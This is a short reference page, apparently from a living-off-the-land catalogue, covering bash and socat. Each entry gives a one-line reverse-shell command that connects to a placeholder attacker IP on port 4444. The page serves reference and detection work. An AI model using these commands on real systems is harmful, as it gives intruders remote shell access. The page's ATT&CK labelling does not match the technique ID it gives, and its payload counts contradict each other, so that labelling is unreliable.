T1071Tactic: Execution & Defense EvasionOfficial MITRE ATT&CK Page

T1071: Technique T1071

Adversaries may leverage living-off-the-land techniques (T1071) to achieve execution, evade defenses, or transfer tools.

Total Capable Binaries: 2
Windows: 0
Linux: 2
macOS: 0

Living-off-the-Land Matrix for T1071

Across 2 verified binaries
Linux2 payloads

bash

The GNU Bourne Again SHell (bash) is the default interactive shell on most Linux distributions. Abused for spawning interactive reverse TCP shells, executing encoded base64 commands, and privilege escalation.

Sample Attack Vector:
bash -i >& /dev/tcp/10.10.14.5/4444 0>&1
Linux1 payloads

socat

Socat is a command-line based utility that establishes two bidirectional byte streams and transfers data between them. Attackers use socat to establish encrypted TTY reverse shells and tunnel traffic across isolated network zones.

Sample Attack Vector:
socat tcp-connect:10.10.14.5:4444 exec:"bash -li",pty,stderr,setsid,sigint,sane
Sharon Ben Moshe
Curated & Verified by
Sharon Ben Moshe
Cybersecurity Researcher & Detection EngineerCheck Point